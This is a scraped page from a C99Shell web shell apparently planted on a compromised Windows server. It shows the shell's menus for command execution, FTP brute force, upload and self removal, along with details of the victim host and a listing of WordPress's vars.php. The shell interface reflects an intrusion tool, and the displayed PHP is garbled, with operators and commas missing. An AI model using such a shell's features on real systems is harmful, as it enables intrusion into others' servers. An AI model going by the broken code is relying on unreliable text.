!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\jaime\wordpress\wp-includes\   drwxrwxrwx
Free 4.03 GB of 39.52 GB (10.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     vars.php (3.83 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

// On which page are we ?
if (preg_match('#([^/]+.php)#'$PHP_SELF$self_matches)) {
    
$pagenow $self_matches[1];
} else if (
strstr($PHP_SELF'?')) {
    
$pagenow explode('/'$PHP_SELF);
    
$pagenow trim($pagenow[(sizeof($pagenow)-1)]);
    
$pagenow explode('?'$pagenow);
    
$pagenow $pagenow[0];
} else {
    
$pagenow 'index.php';
}

// Simple browser detection
$is_lynx 0$is_gecko 0$is_winIE 0$is_macIE 0$is_opera 0$is_NS4 0;
if (!isset(
$HTTP_USER_AGENT)) {
    
$HTTP_USER_AGENT $_SERVER['HTTP_USER_AGENT'];
}
if (
preg_match('/Lynx/'$HTTP_USER_AGENT)) {
    
$is_lynx 1;
} elseif (
preg_match('/Gecko/'$HTTP_USER_AGENT)) {
    
$is_gecko 1;
} elseif ((
preg_match('/MSIE/'$HTTP_USER_AGENT)) && (preg_match('/Win/'$HTTP_USER_AGENT))) {
    
$is_winIE 1;
} elseif ((
preg_match('/MSIE/'$HTTP_USER_AGENT)) && (preg_match('/Mac/'$HTTP_USER_AGENT))) {
    
$is_macIE 1;
} elseif (
preg_match('/Opera/'$HTTP_USER_AGENT)) {
    
$is_opera 1;
} elseif ((
preg_match('/Nav/'$HTTP_USER_AGENT) ) || (preg_match('/Mozilla\/4\./'$HTTP_USER_AGENT))) {
    
$is_NS4 1;
}
$is_IE    = (($is_macIE) || ($is_winIE));

// Server detection
$is_apache = ( strstr($_SERVER['SERVER_SOFTWARE'], 'Apache') || strstr($_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') ) ? 0;
$is_IIS strstr($_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS') ? 0;

// On OS X Server, $_SERVER['REMOTE_ADDR'] is the server's address. Workaround this 
// by using $_SERVER['HTTP_PC_REMOTE_ADDR'], which *is* the remote address.
if ( isset($_SERVER['HTTP_PC_REMOTE_ADDR']) )
    
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PC_REMOTE_ADDR'];

// if the config file does not provide the smilies array, let's define it here
if (!isset($wpsmiliestrans)) {
    
$wpsmiliestrans = array(
    
' :)'        => 'icon_smile.gif',
    
' :D'        => 'icon_biggrin.gif',
    
' :-D'       => 'icon_biggrin.gif',
    
':grin:'    => 'icon_biggrin.gif',
    
' :)'        => 'icon_smile.gif',
    
' :-)'       => 'icon_smile.gif',
    
':smile:'   => 'icon_smile.gif',
    
' :('        => 'icon_sad.gif',
    
' :-('       => 'icon_sad.gif',
    
':sad:'     => 'icon_sad.gif',
    
' :o'        => 'icon_surprised.gif',
    
' :-o'       => 'icon_surprised.gif',
    
':eek:'     => 'icon_surprised.gif',
    
' 8O'        => 'icon_eek.gif',
    
' 8-O'       => 'icon_eek.gif',
    
':shock:'   => 'icon_eek.gif',
    
' :?'        => 'icon_confused.gif',
    
' :-?'       => 'icon_confused.gif',
    
' :???:'     => 'icon_confused.gif',
    
' 8)'        => 'icon_cool.gif',
    
' 8-)'       => 'icon_cool.gif',
    
':cool:'    => 'icon_cool.gif',
    
':lol:'     => 'icon_lol.gif',
    
' :x'        => 'icon_mad.gif',
    
' :-x'       => 'icon_mad.gif',
    
':mad:'     => 'icon_mad.gif',
    
' :P'        => 'icon_razz.gif',
    
' :-P'       => 'icon_razz.gif',
    
':razz:'    => 'icon_razz.gif',
    
':oops:'    => 'icon_redface.gif',
    
':cry:'     => 'icon_cry.gif',
    
':evil:'    => 'icon_evil.gif',
    
':twisted:' => 'icon_twisted.gif',
    
':roll:'    => 'icon_rolleyes.gif',
    
':wink:'    => 'icon_wink.gif',
    
' ;)'        => 'icon_wink.gif',
    
' ;-)'       => 'icon_wink.gif',
    
':!:'       => 'icon_exclaim.gif',
    
':?:'       => 'icon_question.gif',
    
':idea:'    => 'icon_idea.gif',
    
':arrow:'   => 'icon_arrow.gif',
    
' :|'        => 'icon_neutral.gif',
    
' :-|'       => 'icon_neutral.gif',
    
':neutral:' => 'icon_neutral.gif',
    
':mrgreen:' => 'icon_mrgreen.gif',
    );
}

// sorts the smilies' array
if (!function_exists('smiliescmp')) {
function 
smiliescmp ($a$b) {
    if (
strlen($a) == strlen($b)) {
        return 
strcmp($a$b);
    }
        return (
strlen($a) > strlen($b)) ? -1;
    }
}
uksort($wpsmiliestrans'smiliescmp');

// generates smilies' search & replace arrays
foreach($wpsmiliestrans as $smiley => $img) {
    
$wp_smiliessearch[] = $smiley;
    
$smiley_masked htmlspecialcharstrim($smiley) , ENT_QUOTES);
    
$wp_smiliesreplace[] = " <img src='" get_settings('siteurl') . "/wp-includes/images/smilies/$img' alt='$smiley_masked' class='wp-smiley' /> ";
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--